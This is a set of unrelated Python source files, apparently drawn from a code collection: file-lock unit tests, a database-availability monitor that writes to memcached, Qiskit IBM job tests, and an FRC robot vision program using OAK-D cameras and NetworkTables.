mach = file_lock_machine.Machine('chrotomation.mtv', '/tmp', auto=True)
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=False))
for _ in range(10):
self.assertTrue(mach.Unlock(exclusive=False))
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
def testExclusiveLock(self):
mach = file_lock_machine.Machine('atree.mtv', '/tmp')
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=True))
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
mach = file_lock_machine.Machine('atree.mtv', '/tmp', auto=True)
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=True))
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
def testExclusiveState(self):
mach = file_lock_machine.Machine('testExclusiveState', '/tmp')
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
mach = file_lock_machine.Machine('testExclusiveState', '/tmp', auto=True)
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
def testAutoLockGone(self):
mach = file_lock_machine.Machine('lockgone', '/tmp', auto=True)
p = Process(target=LockAndSleep, args=('lockgone',))
p.start()
time.sleep(1.1)
p.join()
self.assertTrue(mach.Lock(exclusive=True))
def testAutoLockFromOther(self):
mach = file_lock_machine.Machine('other_lock', '/tmp', auto=True)
p = Process(target=LockAndSleep, args=('other_lock',))
p.start()
time.sleep(0.5)
self.assertFalse(mach.Lock(exclusive=True))
p.join()
time.sleep(0.6)
self.assertTrue(mach.Lock(exclusive=True))
def testUnlockByOthers(self):
mach = file_lock_machine.Machine('other_unlock', '/tmp', auto=True)
p = Process(target=LockAndSleep, args=('other_unlock',))
p.start()
time.sleep(0.5)
self.assertTrue(mach.Unlock(exclusive=True))
self.assertTrue(mach.Lock(exclusive=True))
if __name__ == '__main__':
unittest.main()
|
focus.py
|
import multiprocessing
import os
import pylibmc
import pyodbc
from raven import Client
import signal
import time
from logger import logger
from secrets import secrets
if 'DEVELOPMENT' in os.environ:
raven = Client()
else:
raven = Client(secrets['SENTRY_DSN'])
def main():
# How frequent to attempt connection in seconds. Should be low enough to
# discover a non-working connection as soon as possible, but high enough not
# to cause significant load on the database.
check_interval = 1
# How long to wait for connection before timing out. Applies both to
# pyodbc's internal timeout mechanism and our own hard process cutoff
# timeout. In seconds.
timeout = 5
# How long the stored value should be valid. Should never be shorter than
# the value of `check_interval` or `timeout`. In seconds.
cache_time = 10
logger.info(
"initializing with check_interval=%s, timeout=%s, cache_time=%s" % (
check_interval,
timeout,
cache_time,
)
)
host, port = secrets['DATABASES_FOCUS_HOST_PROD'].split(',')
connection_string = ';'.join([
'DRIVER={FreeTDS}',
'SERVER=%s' % host,
'PORT=%s' % port,
'DATABASE=%s' % secrets['DATABASES_FOCUS_NAME_PROD'],
'UID=%s' % secrets['DATABASES_FOCUS_USER_PROD'],
'PWD=%s' % secrets['DATABASES_FOCUS_PASSWORD_PROD'],
])
mc = pylibmc.Client(
["memcached"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True},
)
logger.debug("memcached connection established")
def attempt_connection():
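        # Open a connection, run a trivial query, and close it; the exit code of
        # the wrapping process (0 on success) tells the parent whether the
        # database responded in time.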
connection = pyodbc.connect(connection_string, timeout=timeout)
cursor = connection.cursor()
cursor.execute('select @@version').fetchall()
cursor.close()
connection.close()
previous_availability = None
while True:
# Note that `timeout` argument will *not* ensure consistent timeouts for
# any connection problem. It sets the ODBC API connection attribute
# SQL_ATTR_LOGIN_TIMEOUT, but not SQL_ATTR_CONNECTION_TIMEOUT.
# See https://github.com/mkleehammer/pyodbc/issues/106
# Therefore, perform the connection in a separate process. pyodbc
# acquires the GIL lock during connection, so signalling or threading
# wouldn't work here.
connection_process = multiprocessing.Process(target=attempt_connection)
connection_process.start()
connection_process.join(timeout)
# If the connection attempt didn't finish, terminate it; it will get a
# non-zero exit code
if connection_process.is_alive():
# connection_process.terminate() sends SIGINT and pyodbc doesn't
# seem to respond to that while blocking. It does respond to SIGHUP,
# so send that.
os.kill(connection_process.pid, signal.SIGHUP)
connection_process.join()
focus_available = connection_process.exitcode == 0
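        # Publish the availability flag to memcached; the entry expires after cache_time seconds.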
mc.set("focus.connection", focus_available, time=cache_time)
if previous_availability != focus_available:
logger.info("Focus availability changed to %s" % focus_available)
previous_availability = focus_available
time.sleep(check_interval)
if __name__ == '__main__':
try:
main()
raise Exception("Main loop finished unexpectedly")
except Exception:
raven.captureException()
raise
|
test_ibm_job.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""IBMJob Test."""
import time
import copy
from datetime import datetime, timedelta
from unittest import SkipTest, mock
from threading import Thread, Event
from dateutil import tz
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.test import slow_test
from qiskit.test.reference_circuits import ReferenceCircuits
from qiskit.compiler import transpile
from qiskit.result import Result
from qiskit.providers.jobstatus import JobStatus, JOB_FINAL_STATES
from qiskit_ibm import least_busy
from qiskit_ibm.apiconstants import ApiJobStatus, API_JOB_FINAL_STATES
from qiskit_ibm.ibm_backend import IBMRetiredBackend
from qiskit_ibm.exceptions import IBMBackendApiError
from qiskit_ibm.utils.utils import api_status_to_job_status
from qiskit_ibm.job.exceptions import IBMJobTimeoutError, IBMJobNotFoundError
from qiskit_ibm.api.rest.job import Job as RestJob
from qiskit_ibm.api.exceptions import RequestsApiError
from ..ibm_test_case import IBMTestCase
from ..decorators import (requires_provider, requires_device)
from ..utils import (most_busy_backend, cancel_job,
submit_job_bad_shots, submit_and_cancel, submit_job_one_bad_instr)
from ..fake_account_client import BaseFakeAccountClient, CancelableFakeJob
class TestIBMJob(IBMTestCase):
"""Test ibm_job module."""
@classmethod
@requires_provider
def setUpClass(cls, provider):
"""Initial class level setup."""
# pylint: disable=arguments-differ
super().setUpClass()
cls.provider = provider
cls.sim_backend = provider.get_backend('ibmq_qasm_simulator')
cls.bell = transpile(ReferenceCircuits.bell(), cls.sim_backend)
cls.sim_job = cls.sim_backend.run(cls.bell)
cls.last_month = datetime.now() - timedelta(days=30)
@slow_test
@requires_device
def test_run_device(self, backend):
"""Test running in a real device."""
shots = 8192
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
shots=shots)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result = job.result()
counts_qx = result.get_counts(0)
counts_ex = {'00': shots / 2, '11': shots / 2}
self.assertDictAlmostEqual(counts_qx, counts_ex, shots * 0.2)
# Test fetching the job properties, as this is a real backend and is
# guaranteed to have them.
self.assertIsNotNone(job.properties())
def test_run_multiple_simulator(self):
"""Test running multiple jobs in a simulator."""
num_qubits = 16
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 5
job_array = [self.sim_backend.run(transpile([qc] * 20), shots=2048)
for _ in range(num_jobs)]
timeout = 30
start_time = time.time()
while True:
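            # Poll until at least two jobs are observed RUNNING at the same time,
            # all jobs finish early, or the timeout expires while the backend
            # queue is short.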
check = sum(
[job.status() is JobStatus.RUNNING for job in job_array])
if check >= 2:
self.log.info('found %d simultaneous jobs', check)
break
if all([job.status() is JobStatus.DONE for job in job_array]):
# done too soon? don't generate error
self.log.warning('all jobs completed before simultaneous jobs '
'could be detected')
break
for job in job_array:
self.log.info('%s %s %s %s', job.status(), job.status() is JobStatus.RUNNING,
check, job.job_id())
self.log.info('- %s', str(time.time() - start_time))
if time.time() - start_time > timeout and self.sim_backend.status().pending_jobs <= 5:
raise TimeoutError('Failed to see multiple running jobs after '
'{0} seconds.'.format(timeout))
time.sleep(0.2)
result_array = [job.result() for job in job_array]
self.log.info('got back all job results')
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
@slow_test
@requires_device
def test_run_multiple_device(self, backend):
"""Test running multiple jobs in a real device."""
num_qubits = 5
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 3
job_array = [backend.run(transpile(qc, backend=backend))
for _ in range(num_jobs)]
time.sleep(3) # give time for jobs to start (better way?)
job_status = [job.status() for job in job_array]
num_init = sum(
[status is JobStatus.INITIALIZING for status in job_status])
num_queued = sum([status is JobStatus.QUEUED for status in job_status])
num_running = sum(
[status is JobStatus.RUNNING for status in job_status])
num_done = sum([status is JobStatus.DONE for status in job_status])
num_error = sum([status is JobStatus.ERROR for status in job_status])
self.log.info('number of currently initializing jobs: %d/%d',
num_init, num_jobs)
self.log.info('number of currently queued jobs: %d/%d',
num_queued, num_jobs)
self.log.info('number of currently running jobs: %d/%d',
num_running, num_jobs)
self.log.info('number of currently done jobs: %d/%d',
num_done, num_jobs)
self.log.info('number of errored jobs: %d/%d',
num_error, num_jobs)
self.assertTrue(num_jobs - num_error - num_done > 0)
# Wait for all the results.
for job in job_array:
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result_array = [job.result() for job in job_array]
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
def test_cancel(self):
"""Test job cancellation."""
# Find the most busy backend
backend = most_busy_backend(self.provider)
submit_and_cancel(backend)
def test_retrieve_jobs(self):
"""Test retrieving jobs."""
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=5, skip=0,
start_datetime=self.last_month, ignore_composite_jobs=True)
self.assertLessEqual(len(job_list), 5)
for job in job_list:
self.assertTrue(isinstance(job.job_id(), str))
def test_retrieve_job(self):
"""Test retrieving a single job."""
retrieved_job = self.provider.backend.job(self.sim_job.job_id())
self.assertEqual(self.sim_job.job_id(), retrieved_job.job_id())
self.assertEqual(self.sim_job.qobj().to_dict(), retrieved_job.qobj().to_dict())
self.assertEqual(self.sim_job.result().get_counts(), retrieved_job.result().get_counts())
@requires_device
def test_retrieve_job_uses_appropriate_backend(self, backend):
"""Test that retrieved jobs come from their appropriate backend."""
backend_1 = backend
# Get a second backend.
backend_2 = None
provider = backend.provider()
for my_backend in provider.backends():
if my_backend.status().operational and my_backend.name() != backend_1.name():
backend_2 = my_backend
break
if not backend_2:
raise SkipTest('Skipping test that requires multiple backends')
job_1 = backend_1.run(transpile(ReferenceCircuits.bell(), backend_1))
job_2 = backend_2.run(transpile(ReferenceCircuits.bell(), backend_2))
# test a retrieved job's backend is the same as the queried backend
self.assertEqual(provider.backend.job(job_1.job_id()).backend().name(),
backend_1.name())
self.assertEqual(provider.backend.job(job_2.job_id()).backend().name(),
backend_2.name())
# Cleanup
for job in [job_1, job_2]:
cancel_job(job)
def test_retrieve_job_error(self):
"""Test retrieving an invalid job."""
self.assertRaises(IBMJobNotFoundError,
self.provider.backend.job, 'BAD_JOB_ID')
def test_retrieve_jobs_status(self):
"""Test retrieving jobs filtered by status."""
status_args = [JobStatus.DONE, 'DONE', [JobStatus.DONE], ['DONE']]
for arg in status_args:
with self.subTest(arg=arg):
backend_jobs = self.provider.backend.jobs(
backend_name=self.sim_backend.name(),
limit=5, skip=5, status=arg, start_datetime=self.last_month,
ignore_composite_jobs=True)
self.assertTrue(backend_jobs)
for job in backend_jobs:
self.assertTrue(job.status() is JobStatus.DONE,
"Job {} has status {} when it should be DONE"
.format(job.job_id(), job.status()))
def test_retrieve_multiple_job_statuses(self):
"""Test retrieving jobs filtered by multiple job statuses."""
statuses_to_filter = [JobStatus.ERROR, JobStatus.CANCELLED]
status_filters = [
[JobStatus.ERROR, JobStatus.CANCELLED],
['ERROR', 'CANCELLED'],
[JobStatus.ERROR, 'CANCELLED']
]
job_to_cancel = submit_and_cancel(backend=self.sim_backend)
job_to_fail = submit_job_bad_shots(backend=self.sim_backend)
job_to_fail.wait_for_final_state()
for status_filter in status_filters:
with self.subTest(status_filter=status_filter):
job_list = self.provider.backend.jobs(
status=status_filter,
start_datetime=self.last_month,
ignore_composite_jobs=True)
job_list_ids = [_job.job_id() for _job in job_list]
if job_to_cancel.status() is JobStatus.CANCELLED:
self.assertIn(job_to_cancel.job_id(), job_list_ids)
self.assertIn(job_to_fail.job_id(), job_list_ids)
for filtered_job in job_list:
self.assertIn(filtered_job._status, statuses_to_filter,
"job {} has status {} but should be one of {}"
.format(filtered_job.job_id(), filtered_job._status,
statuses_to_filter))
def test_retrieve_active_jobs(self):
"""Test retrieving jobs that are currently unfinished."""
backend = most_busy_backend(self.provider)
active_job_statuses = {api_status_to_job_status(status) for status in ApiJobStatus
if status not in API_JOB_FINAL_STATES}
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
active_jobs = backend.active_jobs()
if not job.in_final_state(): # Job is still active.
self.assertIn(job.job_id(), [active_job.job_id() for active_job in active_jobs])
for active_job in active_jobs:
self.assertTrue(active_job._status in active_job_statuses,
"status for job {} is '{}' but it should be '{}'."
.format(active_job.job_id(), active_job._status, active_job_statuses))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_queued(self):
"""Test retrieving jobs that are queued."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
provider = backend.provider()
# Wait for the job to queue, run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.QUEUED, JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_queued = provider.backend.jobs(status=JobStatus.QUEUED, limit=5,
start_datetime=self.last_month,
ignore_composite_jobs=True)
if before_status is JobStatus.QUEUED and job.status() is JobStatus.QUEUED:
self.assertIn(job.job_id(), [queued_job.job_id() for queued_job in job_list_queued],
"job {} is queued but not retrieved when filtering for queued jobs."
.format(job.job_id()))
for queued_job in job_list_queued:
self.assertTrue(queued_job._status == JobStatus.QUEUED,
"status for job {} is '{}' but it should be {}"
.format(queued_job.job_id(), queued_job._status, JobStatus.QUEUED))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_running(self):
"""Test retrieving jobs that are running."""
job = self.sim_backend.run(self.bell)
# Wait for the job to run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_running = self.provider.backend.jobs(status=JobStatus.RUNNING, limit=5,
start_datetime=self.last_month,
ignore_composite_jobs=True)
if before_status is JobStatus.RUNNING and job.status() is JobStatus.RUNNING:
self.assertIn(job.job_id(), [rjob.job_id() for rjob in job_list_running])
for rjob in job_list_running:
self.assertTrue(rjob._status == JobStatus.RUNNING,
"Status for job {} is '{}' but should be RUNNING"
.format(rjob.job_id(), rjob._status))
def test_retrieve_jobs_start_datetime(self):
"""Test retrieving jobs created after a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, start_datetime=past_month,
ignore_composite_jobs=True)
self.assertTrue(job_list)
for job in job_list:
self.assertGreaterEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_end_datetime(self):
"""Test retrieving jobs created before a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, end_datetime=past_month,
ignore_composite_jobs=True)
self.assertTrue(job_list)
for job in job_list:
self.assertLessEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_between_datetimes(self):
"""Test retrieving jobs created between two specified datetimes."""
date_today = datetime.now()
past_month = date_today - timedelta(30)
past_two_month = date_today - timedelta(60)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
past_two_month_tz_aware = past_two_month.replace(tzinfo=tz.tzlocal())
with self.subTest():
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=2,
start_datetime=past_two_month, end_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertTrue(
(past_two_month_tz_aware <= job.creation_date() <= past_month_tz_aware),
'job {} creation date {} not within range'.format(
job.job_id(), job.creation_date()))
def test_retrieve_jobs_order(self):
"""Test retrieving jobs with different orders."""
job = self.sim_backend.run(self.bell)
job.wait_for_final_state()
newest_jobs = self.provider.backend.jobs(
limit=10, status=JobStatus.DONE, descending=True, start_datetime=self.last_month,
ignore_composite_jobs=True)
self.assertIn(job.job_id(), [rjob.job_id() for rjob in newest_jobs])
oldest_jobs = self.provider.backend.jobs(
limit=10, status=JobStatus.DONE, descending=False, start_datetime=self.last_month,
ignore_composite_jobs=True)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in oldest_jobs])
def test_retrieve_failed_job_simulator_partial(self):
"""Test retrieving partial results from a simulator backend."""
job = submit_job_one_bad_instr(self.sim_backend)
result = job.result(partial=True)
self.assertIsInstance(result, Result)
self.assertTrue(result.results[0].success)
self.assertFalse(result.results[1].success)
@slow_test
def test_pulse_job(self):
"""Test running a pulse job."""
backends = self.provider.backends(open_pulse=True, operational=True)
if not backends:
raise SkipTest('Skipping pulse test since no pulse backend found.')
backend = least_busy(backends)
config = backend.configuration()
defaults = backend.defaults()
inst_map = defaults.instruction_schedule_map
# Run 2 experiments - 1 with x pulse and 1 without
x = inst_map.get('x', 0)
measure = inst_map.get('measure', range(config.n_qubits)) << x.duration
ground_sched = measure
excited_sched = x | measure
schedules = [ground_sched, excited_sched]
job = backend.run(schedules, meas_level=1, shots=256)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
self.assertTrue(job.done(), "Job {} didn't complete successfully.".format(job.job_id()))
self.assertIsNotNone(job.result(), "Job {} has no result.".format(job.job_id()))
def test_retrieve_from_retired_backend(self):
"""Test retrieving a job from a retired backend."""
saved_backends = copy.copy(self.provider._backends)
try:
del self.provider._backends[self.sim_backend.name()]
new_job = self.provider.backend.job(self.sim_job.job_id())
self.assertTrue(isinstance(new_job.backend(), IBMRetiredBackend))
self.assertNotEqual(new_job.backend().name(), 'unknown')
last_month_jobs = self.provider.backend.jobs(start_datetime=self.last_month)
last_month_job_ids = [job.job_id() for job in last_month_jobs]
self.assertIn(new_job.job_id(), last_month_job_ids)
finally:
self.provider._backends = saved_backends
def test_refresh_job_result(self):
"""Test re-retrieving job result via refresh."""
result = self.sim_job.result()
# Save original cached results.
cached_result = copy.deepcopy(result.to_dict())
self.assertTrue(cached_result)
# Modify cached results.
result.results[0].header.name = 'modified_result'
self.assertNotEqual(cached_result, result.to_dict())
self.assertEqual(result.results[0].header.name, 'modified_result')
# Re-retrieve result via refresh.
result = self.sim_job.result(refresh=True)
self.assertDictEqual(cached_result, result.to_dict())
self.assertNotEqual(result.results[0].header.name, 'modified_result')
def test_wait_for_final_state(self):
"""Test waiting for job to reach final state."""
def final_state_callback(c_job_id, c_status, c_job, **kwargs):
"""Job status query callback function."""
self.assertEqual(c_job_id, job.job_id())
self.assertNotIn(c_status, JOB_FINAL_STATES)
self.assertEqual(c_job.job_id(), job.job_id())
self.assertIn('queue_info', kwargs)
queue_info = kwargs.pop('queue_info', None)
callback_info['called'] = True
if wait_time is None:
# Look for status change.
data = {'status': c_status, 'queue_info': queue_info}
self.assertNotEqual(data, callback_info['last data'])
callback_info['last data'] = data
else:
# Check called within wait time.
if callback_info['last call time'] and job._status not in JOB_FINAL_STATES:
self.assertAlmostEqual(
time.time() - callback_info['last call time'], wait_time, delta=0.2)
callback_info['last call time'] = time.time()
def job_canceller(job_, exit_event, wait):
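            # Cancel the job once `wait` seconds pass or the exit event fires, whichever comes first.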
exit_event.wait(wait)
cancel_job(job_)
wait_args = [2, None]
saved_api = self.sim_backend._api_client
try:
self.sim_backend._api_client = BaseFakeAccountClient(job_class=CancelableFakeJob)
for wait_time in wait_args:
with self.subTest(wait_time=wait_time):
# Put callback data in a dictionary to make it mutable.
callback_info = {'called': False, 'last call time': 0.0, 'last data': {}}
cancel_event = Event()
job = self.sim_backend.run(self.bell)
# Cancel the job after a while.
Thread(target=job_canceller, args=(job, cancel_event, 7), daemon=True).start()
try:
job.wait_for_final_state(timeout=10, wait=wait_time,
callback=final_state_callback)
self.assertTrue(job.in_final_state())
self.assertTrue(callback_info['called'])
cancel_event.set()
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
finally:
self.sim_backend._api_client = saved_api
def test_wait_for_final_state_timeout(self):
"""Test waiting for job to reach final state times out."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend))
try:
self.assertRaises(IBMJobTimeoutError, job.wait_for_final_state, timeout=0.1)
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
cancel_job(job)
def test_job_submit_partial_fail(self):
"""Test job submit partial fail."""
job_id = []
def _side_effect(self, *args, **kwargs):
# pylint: disable=unused-argument
job_id.append(self.job_id)
raise RequestsApiError('Kaboom')
fail_points = ['put_object_storage', 'callback_upload']
for fail_method in fail_points:
with self.subTest(fail_method=fail_method):
with mock.patch.object(RestJob, fail_method,
side_effect=_side_effect, autospec=True):
with self.assertRaises(IBMBackendApiError):
self.sim_backend.run(self.bell)
self.assertTrue(job_id, "Job ID not saved.")
job = self.provider.backend.job(job_id[0])
self.assertEqual(job.status(), JobStatus.CANCELLED,
f"Job {job.job_id()} status is {job.status()} and not cancelled!")
def test_job_circuits(self):
"""Test job circuits."""
self.assertEqual(str(self.bell), str(self.sim_job.circuits()[0]))
def test_job_backend_options(self):
"""Test job backend options."""
run_config = {'shots': 2048, 'memory': True}
job = self.sim_backend.run(self.bell, **run_config)
self.assertLessEqual(run_config.items(), job.backend_options().items())
def test_job_header(self):
"""Test job header."""
|
main.py
|
#!/usr/bin/env python3
import argparse
import operator
import threading
import numpy as np
from time import sleep
import cv2
import depthai as dai
import socket
from common.config import NN_IMG_SIZE
from common.cscore_stream import CsCoreStream
from pipelines import goal_edge_depth_detection, object_edge_detection
import logging
from common import target_finder
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
        try:
            # Opening a UDP socket to a public address reveals the host's outbound
            # IP; no packets are actually sent until data is written.
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("8.8.8.8", 80))
            ip_address = s.getsockname()[0]
            s.close()
        except OSError:
            ip_address = 'localhost'
port1 = 5801
port2 = 5802
self.device_list = {"OAK-D_Goal": {
'name': "OAK-D_Goal",
'id': "14442C1091398FD000",
# 'id': "14442C10218CCCD200",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-D_Goal")
}, "OAK-1_Intake": {
'name': "OAK-1_Intake",
'id': "14442C1011043ED700",
# 'id': "14442C10C14F47D700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-1_Intake")
}}
self.goal_pipeline, self.goal_labels = goal_edge_depth_detection.create_pipeline("infiniteRecharge2021")
self.intake_pipeline, self.intake_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.oak_d_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
# self.oak_d_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
# self.oak_1_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
kernel = np.ones((3, 3), np.uint8)
edgeFrame = cv2.morphologyEx(edgeFrame, cv2.MORPH_CLOSE, kernel, iterations=1)
# edgeFrame = cv2.threshold(edgeFrame, 20, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-D_Goal']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
else:
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_hexagon_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
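                # Convert the pixel offset from the image centre into an angle;
                # 68.7938.../1920 is presumably degrees per pixel for the camera's
                # horizontal field of view at 1920 px width.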
angle_offset = (target_x - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
nt_tab.putNumber("tz", bbox['depth_z'])
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']),
(255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128),
thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-D_Goal']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_d_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_intake_frame(self, frame, edgeFrame, bboxes):
edgeFrame = cv2.threshold(edgeFrame, 60, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-1_Intake']['nt_tab']
filtered_bboxes = []
for bbox in bboxes:
if self.intake_labels[bbox['label']] in valid_labels:
filtered_bboxes.append(bbox)
filtered_bboxes.sort(key=operator.itemgetter('size'), reverse=True)
if len(filtered_bboxes) == 0:
nt_tab.putNumber("tv", 0)
nt_tab.putNumberArray("ta", [0])
else:
nt_tab.putNumber("tv", 1)
target_angles = []
for bbox in filtered_bboxes:
angle_offset = (bbox['x_mid'] - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
target_angles.append(angle_offset)
bbox['angle_offset'] = angle_offset
nt_tab.putNumberArray("ta", target_angles)
fps = self.device_list['OAK-1_Intake']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, filtered_bboxes
def init_networktables(self):
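        # Try the FRC team client first; if that fails, fall back to a list of
        # known robot and localhost addresses.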
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-D_Goal']['id'])
self.device_list['OAK-D_Goal']['nt_tab'].putBoolean("OAK-D_Goal Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-1_Intake']['id'])
self.device_list['OAK-1_Intake']['nt_tab'].putBoolean("OAK-1_Intake Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_intake_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
            while True:
                # Stop supervising once any capture thread has died.
                if any(not t.is_alive() for t in threadlist):
                    break
